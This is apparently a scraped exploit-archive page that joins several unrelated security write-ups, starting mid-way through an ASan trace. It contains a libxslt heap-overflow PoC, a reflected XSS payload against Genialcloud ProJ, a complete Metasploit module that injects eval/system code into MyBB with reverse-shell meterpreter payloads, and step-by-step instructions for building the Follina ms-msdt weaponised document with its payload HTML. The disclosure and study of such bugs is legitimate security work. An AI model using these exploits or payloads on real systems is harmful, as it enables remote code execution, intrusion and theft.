Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==93182==ABORTING
```


XSLT version (no XML_PARSE_HUGE needed)
```
<?xml version="1.0"?>
<test-cases>
  <test-case length="2048">A</test-case>
</test-cases>

√ fwilhelm2 libxslt % cat poc.xslt
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:str="http://exslt.org/strings"
  xmlns:exsl="http://exslt.org/common"
  exclude-result-prefixes="str">

<xsl:output indent="yes"/>

<xsl:template match="test-cases">
  <test-results>
    <xsl:apply-templates select="test-case"/>
  </test-results>
</xsl:template>

<xsl:template match="test-case">
  <test-result>
    <xsl:variable name="padding">
      <xsl:value-of select="str:padding(@length)"/>
    </xsl:variable>
    <xsl:variable name="l1">
      <xsl:value-of select="concat($padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding)"/>
    </xsl:variable>
    <xsl:variable name="l2">
      <xsl:value-of select="concat($l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1)"/>
    </xsl:variable>
    <xsl:variable name="l3">
      <xsl:value-of select="concat($l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2)"/>
    </xsl:variable>
    <xsl:variable name="l4">
      <xsl:value-of select="concat($l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3)"/>
    </xsl:variable>
    <xsl:variable name="l5">
      <xsl:value-of select="concat($l4,$l4,$l4,$l4,$l4,$l4,$l4,$l4)"/>
    </xsl:variable>
    <xsl:variable name="temp">
      <a><xsl:copy-of select="$l5"/></a>
      <a><xsl:copy-of select="$l5"/></a>
      <a><xsl:copy-of select="$l5"/></a>
      <a><xsl:copy-of select="$l5"/></a>
    </xsl:variable>
    <foo>
      <xsl:value-of select="string-length($temp)"/>
    </foo>
  </test-result>
</xsl:template>
</xsl:stylesheet>

√ fwilhelm2 libxslt % ./xsltproc/xsltproc poc.xslt poc.xml
=================================================================
==244487==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fe4cc4ee80c at pc 0x0000004b37d2 bp 0x7ffd8a145aa0 sp 0x7ffd8a145268
WRITE of size 1073741824 at 0x7fe4cc4ee80c thread T0
    #0 0x4b37d1 in __asan_memmove (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b37d1)
    #1 0x884dc1 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:908:5
    #2 0x6dadae in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33
    #3 0x6dac8a in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5548:7
    #4 0x6db62f in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c
    #5 0x7c80fc in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16
    #6 0x7c80fc in xmlXPathCastNodeSetToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5733:12
    #7 0x7dc654 in xmlXPathCacheConvertString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:2698:8
    #8 0x7decca in xmlXPathStringFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8906:21
    #9 0x7df931 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8941:5
    #10 0x80c5e9 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17
    #11 0x808653 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26
    #12 0x7ee321 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2
    #13 0x7ece3c in xmlXPathCompiledEvalInternal /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14339:11
    #14 0x7eca34 in xmlXPathCompiledEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14385:5
    #15 0x588140 in xsltPreCompEval /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:385:11
    #16 0x589ba5 in xsltValueOf /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:4541:11
    #17 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17
    #18 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5
    #19 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2
    #20 0x58cbbc in xsltApplyTemplates /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5095:2
    #21 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17
    #22 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5
    #23 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2
    #24 0x57199f in xsltDefaultProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:1997:3
    #25 0x570b62 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2129:2
    #26 0x593919 in xsltApplyStylesheetInternal /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5987:5
    #27 0x4eb14a in xsltProcess /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c
    #28 0x4e8cf5 in main /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c:935:6
    #29 0x7fe6fc94f7ec in __libc_start_main csu/../csu/libc-start.c:332:16
    #30 0x437759 in _start (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x437759)

0x7fe4cc4ee80c is located 0 bytes to the right of 3221225484-byte region [0x7fe40c4ee800,0x7fe4cc4ee80c)
allocated by thread T0 here:
    #0 0x4b4203 in __interceptor_realloc (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b4203)
    #1 0x8842e0 in xmlBufResize /usr/local/google/home/fwilhelm/code/libxml2/buf.c:829:26
    #2 0x884d30 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:902:14
    #3 0x6dadae in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33
    #4 0x6dac8a in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5548:7
    #5 0x6db62f in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c
    #6 0x7c80fc in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16
    #7 0x7c80fc in xmlXPathCastNodeSetToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5733:12
    #8 0x7dc654 in xmlXPathCacheConvertString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:2698:8
    #9 0x7decca in xmlXPathStringFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8906:21
    #10 0x7df931 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8941:5
    #11 0x80c5e9 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17
    #12 0x808653 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26
    #13 0x7ee321 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2
    #14 0x7ece3c in xmlXPathCompiledEvalInternal
/usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14339:11<br /> #15 0x7eca34 in xmlXPathCompiledEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14385:5<br /> #16 0x588140 in xsltPreCompEval /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:385:11<br /> #17 0x589ba5 in xsltValueOf /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:4541:11<br /> #18 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17<br /> #19 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5<br /> #20 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2<br /> #21 0x58cbbc in xsltApplyTemplates /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5095:2<br /> #22 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17<br /> #23 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5<br /> #24 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2<br /> #25 0x57199f in xsltDefaultProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:1997:3<br /> #26 0x570b62 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2129:2<br /> #27 0x593919 in xsltApplyStylesheetInternal /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5987:5<br /> #28 0x4eb14a in xsltProcess /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c<br /> #29 0x4e8cf5 in main /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c:935:6<br /> #30 0x7fe6fc94f7ec in __libc_start_main csu/../csu/libc-start.c:332:16<br /><br />SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b37d1) in __asan_memmove<br />Shadow bytes 
around the buggy address:<br /> 0x0ffd19895cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0ffd19895cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0ffd19895cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0ffd19895ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0ffd19895cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x0ffd19895d00: 00[04]fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br />Shadow byte legend (one shadow byte represents 8 application bytes):<br /> Addressable: 00<br /> Partially addressable: 01 02 03 04 05 06 07<br /> Heap left redzone: fa<br /> Freed heap region: fd<br /> Stack left redzone: f1<br /> Stack mid redzone: f2<br /> Stack right redzone: f3<br /> Stack after return: f5<br /> Stack use after scope: f8<br /> Global redzone: f9<br /> Global init order: f6<br /> Poisoned by user: f7<br /> Container overflow: fc<br /> Array cookie: ac<br /> Intra object redzone: bb<br /> ASan internal: fe<br /> Left alloca redzone: ca<br /> Right alloca redzone: cb<br />==244487==ABORTING<br />```<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. **The scheduled deadline is 2022-06-06**. 
<br />For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br />Related CVE Numbers: CVE-2022-29824.<br /><br /><br /><br />Found by: fwilhelm@google.com<br /><br /></code></pre>
<pre><code># Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)<br /># Date: 2022-06-01<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: https://www.avantune.com<br /># Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com<br /># Version: 10<br /># Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)<br /># CVE: CVE-2022-29296<br /><br /><br />A reflected Cross-Site Scripting (XSS) vulnerability in the login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the<br />same software house "Avantune", since the codebase seems shared with their other products, Facsys and Analysis) allows a remote attacker to inject<br />and execute arbitrary web scripts or HTML via a crafted payload.<br /><br />The affected request parameter is "msg".<br /><br />PoC Request:<br />GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1<br />Host: [REDACTED]<br />Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2<br />Upgrade-Insecure-Requests: 1<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US,en-GB;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br /><br />PoC Response:<br />HTTP/1.1 200 OK<br />Cache-Control: private<br />Content-Type: text/html; charset=utf-8<br />Server: Microsoft-IIS/10.0<br />X-AspNet-Version: 4.0.30319<br />X-Powered-By: ASP.NET<br />Date: Wed, 11 May 2022 10:51:10 GMT<br />Connection: close<br />Content-Length: 8162<br /><br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br /><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head><link 
rel="stylesheet"<br />...[SNIP]...<br /><script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script><br />...[SNIP]...<br /><br /><br />Timeline:<br /><br />2022-01-05: Vulnerability discovered.<br />2022-01-06: Vendor contacted.<br />2022-02-07: No reply, vendor contacted for 2nd time.<br />2022-02-10: Request for CVE reservation.<br />2022-04-16: Assigned CVE number CVE-2022-29296.<br />2022-05-07: No reply, vendor contacted for 3rd time.<br />2022-06-01: Public disclosure.<br /><br /><br />PoC Screenshots:<br /><br />https://imagebin.ca/v/6j86ekMqKZD8<br />https://postimg.cc/XXv6YbK9<br /><br /><br /></code></pre>
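The advisory above shows "msg" being reflected straight into a JavaScript string literal. The following is an added example, not code from the advisory or the vendor: it reproduces that unsafe concatenation next to a safe rendering of the same fragment, and decodes the PoC query string the way the server sees it. All function names are my own.

```python
"""Added example: unsafe vs. safe reflection of a query parameter into an
inline <script> string literal, using the Genialcloud ProJ PoC request."""
import json
from urllib.parse import parse_qs, urlsplit

# Request path from the advisory's PoC request (only the query is used).
POC_PATH = ("/eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3B"
            "alert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F")


def msg_from_request_path(path: str) -> str:
    """Decoded 'msg' parameter, i.e. the value the login page echoes back."""
    return parse_qs(urlsplit(path).query).get("msg", [""])[0]


def render_vulnerable(msg: str) -> str:
    """Mirror of the page's output: raw concatenation into a JS string literal."""
    return f"<script type=\"text/javascript\"> var Msg = '{msg}';</script>"


def js_string_literal(value: str) -> str:
    """Encode value as a JS string literal that can neither close the literal
    nor the surrounding <script> element.  json.dumps escapes quotes,
    backslashes, control characters and (with ensure_ascii) U+2028/U+2029;
    '<', '>' and '&' are additionally escaped so '</script>' cannot appear."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_safe(msg: str) -> str:
    """Same fragment, with msg emitted through js_string_literal()."""
    return f"<script type=\"text/javascript\"> var Msg = {js_string_literal(msg)};</script>"


def breaks_out_of_literal(rendered: str) -> bool:
    """True if anything other than ';</script>' follows the string literal,
    i.e. the reflected value escaped the JS string context."""
    inner = rendered.split("var Msg = ", 1)[1]
    quote = inner[0]                      # the opening quote character
    i = 1
    while i < len(inner):
        if inner[i] == "\\":              # skip escaped character
            i += 2
            continue
        if inner[i] == quote:             # closing quote found
            break
        i += 1
    return not inner[i + 1:].startswith(";</script>")


if __name__ == "__main__":
    msg = msg_from_request_path(POC_PATH)
    print("vulnerable:", render_vulnerable(msg))
    print("safe:      ", render_safe(msg))
```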
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Powershell<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'MyBB Admin Control Code Injection RCE',<br /> 'Description' => %q{<br /> This exploit module leverages an improper input validation<br /> vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in<br /> the context of the user running the application.<br /><br /> MyBB Admin Control setting page calls PHP `eval` function with an<br /> unsanitized user input. The exploit adds a new setting, injecting the<br /> payload in the vulnerable field, and triggers its execution with a<br /> second request. 
Finally, it takes care of cleaning up and removes the<br /> setting.<br /><br /> Note that authentication is required for this exploit to work and the<br /> account must have rights to add or update settings (typically, myBB<br /> administrator role).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Cillian Collins', # vulnerability research<br /> 'Altelus', # original PoC<br /> 'Christophe De La Fuente' # MSF module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f'],<br /> [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-22-503/'],<br /> [ 'URL', 'https://github.com/Altelus1/CVE-2022-24734'],<br /> [ 'CVE', '2022-24734']<br /> ],<br /> 'Platform' => %w[php unix linux win],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },<br /> 'Type' => :in_memory<br /> }<br /> ],<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_php_ssl' },<br /> 'Type' => :in_memory<br /> }<br /> ],<br /> [<br /> 'Linux (Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },<br /> 'Type' => :dropper<br /> }<br /> ],<br /> [<br /> 'Windows (In-Memory)',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },<br /> 'Type' => :in_memory<br /> }<br /> ],<br /> [<br /> 'Windows (Dropper)',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },<br /> 'Type' => :dropper<br /> }<br /> ]<br /> 
],<br /> 'DisclosureDate' => '2022-03-09',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [ true, 'MyBB Admin CP username' ]),<br /> OptString.new('PASSWORD', [ true, 'MyBB Admin CP password' ]),<br /> OptString.new('TARGETURI', [ true, 'The URI of the MyBB application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'index.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => { 'intcheck' => 1 }<br /> })<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> # see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310<br /> unless res.body.include?('MYBB')<br /> return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")<br /> end<br /><br /> print_good("MyBB forum found running at #{target_uri.path}")<br /><br /> return CheckCode::Detected<br /> end<br /><br /> def login<br /> vprint_status('Attempting login')<br /><br /> cookie_jar.cleanup(true)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/admin/index.php'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'do' => 'login'<br /> }<br /> })<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/)<br /> fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")<br /> end<br /><br /> 
print_good('Login successful!')<br /> end<br /><br /> def send_config_settings(method: 'GET', action: 'add', vars_get: {}, vars_post: {}, check_response: true)<br /> req_hash = {<br /> 'uri' => normalize_uri(target_uri.path, '/admin/index.php'),<br /> 'method' => method,<br /> 'vars_get' => {<br /> 'module' => 'config-settings',<br /> 'action' => action<br /> }.merge(vars_get)<br /> }<br /> req_hash['vars_post'] = vars_post unless vars_post.blank?<br /> res = send_request_cgi(req_hash, datastore['WfsDelay'] > 0 ? datastore['WfsDelay'] : 2)<br /> if check_response && res.nil?<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")<br /> end<br /> res<br /> end<br /><br /> def exploit<br /> login<br /><br /> res = send_config_settings<br /> if res.body.include?('Access Denied')<br /> fail_with(Failure::NoAccess, "#{peer} - Supplied user doesn't have the rights to add a setting")<br /> end<br /><br /> vprint_status('Adding a malicious settings')<br /> doc = res.get_html_document<br /> @my_post_key = doc.xpath('//input[@name="my_post_key"]/@value').text<br /><br /> case target['Type']<br /> when :in_memory<br /> execute_command(payload.encoded)<br /> when :dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def send_payload(cmd)<br /> vprint_status('Adding a crafted configuration setting entry with the payload')<br /><br /> cmd = cmd.gsub(/\\/, '\\' => '\\\\')<br /> cmd = cmd.gsub(/"/, '"' => '\\"')<br /> cmd = cmd.gsub(/\$/, '$' => '\\$')<br /><br /> case target['Platform']<br /> when 'php'<br /> extra = "\" . eval(\"#{cmd}\") .\""<br /> when 'win'<br /> if target['Arch'] == ARCH_CMD<br /> # Force cmd to run in the background (only works for `cmd`)<br /> extra = "\" . pclose(popen(\"start /B #{cmd}\", \"r\")) .\""<br /> else<br /> extra = "\" . system(\"#{cmd}\") .\""<br /> end<br /> else<br /> extra = "\" . 
system(\"#{cmd} > /dev/null &\") .\""<br /> end<br /><br /> post_data = {<br /> my_post_key: @my_post_key,<br /> title: Rex::Text.rand_text_alpha(rand(8...16)),<br /> description: Rex::Text.rand_text_alpha(rand(8...16)),<br /> gid: 1,<br /> disporder: '',<br /> name: Rex::Text.rand_text_alpha(rand(8...16)),<br /> type: "\tphp",<br /> extra: extra,<br /> value: Rex::Text.rand_text_alpha(rand(8...16))<br /> }<br /><br /> res = send_config_settings(method: 'POST', vars_post: post_data)<br /> unless res.code == 302<br /> doc = res.get_html_document<br /> err = doc.xpath('//div[@class="error"]').text<br /> fail_with(Failure::Unknown,<br /> "#{peer} - The module expected a 302 response but received: "\<br /> "#{res.code}. Exploit didn't work.#{" Reason: #{err}" if err.present?}")<br /> end<br /><br /> vprint_good('Payload successfully sent')<br /> end<br /><br /> def trigger_payload<br /> vprint_status('Triggering the payload execution')<br /> # We're not expecting response to this query<br /> send_config_settings(action: 'change', check_response: false)<br /> end<br /><br /> def remove_setting<br /> vprint_status('Removing the configuration setting')<br /><br /> vprint_status('Grab the delete parameters')<br /> res = send_config_settings(action: 'manage')<br /> if res.body.include?('<title>MyBB Control Panel - Login</title>')<br /> # this exploit seems to logout users sometimes, so, try to login again and retry<br /> print_status('User session is not valid anymore. 
Trying to login again to cleanup')<br /> login<br /> res = send_config_settings(action: 'manage')<br /> end<br /><br /> doc = res.get_html_document<br /> control_links = doc.xpath('//div[@class="popup_item_container"]/a/@href')<br /> uri = control_links.detect do |href|<br /> href.text.include?('action=delete') && href.text.include?("my_post_key=#{@my_post_key}")<br /> end<br /> if uri.nil?<br /> print_warning("#{peer} - URI not found in `Modify Settings` page - cannot cleanup")<br /> return<br /> end<br /><br /> vprint_status('Send the delete request')<br /> params = uri.text.split('?')[1]<br /> get_data = CGI.parse(params).transform_values(&:join)<br /> send_config_settings(method: 'POST', vars_get: get_data)<br /> end<br /><br /> def execute_command(cmd, _opt = {})<br /> send_payload(cmd)<br /> trigger_payload<br /> remove_setting<br /> print_status('Shell incoming...')<br /> end<br />end<br /></code></pre>
<pre><code># POC CVE-2022-30190 : CVE 0-day MS Office RCE aka msdt follina <br /><br />> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/)<br /><br />## Summary <br /><br />On the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research<br />Team, discovered a malicious Office document shared on Virustotal. This document<br />uses an unusual but known scheme to infect its victims. The scheme was not detected as<br />malicious by some EDR products, such as Microsoft Defender for Endpoint. This vulnerability could lead to<br />code execution without the need for user interaction, as it does not involve macros, except if the<br />Protected View mode is enabled. There is no CVE number attributed yet.<br /><br /><br />## Technical Details<br /><br />The vulnerability is being exploited by using the MSProtocol URI scheme to load some code.<br />Attackers could embed malicious links beginning with ms-msdt: inside Microsoft Office documents, templates or emails;<br />these are loaded and executed afterward without user interaction,<br />except if the Protected View mode is enabled. Nevertheless, converting the document to<br />the RTF format could also bypass the Protected View feature.<br /><br />## Proof of Concept <br /><br />MS Office docx files may contain external OLE Object references as HTML files. There is a URI scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in its parameters).<br /><br />The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).<br /><br />Here are the steps to build a Proof-of-Concept docx:<br /><br />1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.<br /><br />2. 
Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute<br /><br />```<br />Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"<br />```<br /><br />and `Target="embeddings/oleObject1.bin"` by changing the `Target` value and adding attribute `TargetMode`:<br /><br />```<br />Target = "http://<payload_server>/payload.html!"<br />TargetMode = "External"<br />```<br /><br />Note the Id value (probably it is "rId5").<br /><br />3. Edit `word/document.xml`. Search for the "<o:OLEObject ..>" tag (with `r:id="rId5"`) and change the attribute from `Type="Embed"` to `Type="Link"` and add the attribute `UpdateMode="OnCall"`.<br /><br />NOTE: The created malicious docx is almost the same as for [CVE-2021-40444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444).<br /><br />4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`:<br /><br />```<br /><!doctype html><br /><html lang="en"><br /><body><br /><script><br />//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times<br /> window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";<br /></script><br /><br /></body><br /></html><br />```<br /><br />Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason).<br /><br />## BONUS (0-click RTF version)<br /><br />If you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3:<br /><br />```<br /><o:LinkType>EnhancedMetaFile</o:LinkType><br /><o:LockedField>false</o:LockedField><br /><o:FieldCodes>\f 0</o:FieldCodes><br />```<br /><br />then it will also work as RTF (open the resulting docx and save it as RTF).<br /><br />With RTF, there is no need to open the file in Word; it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE 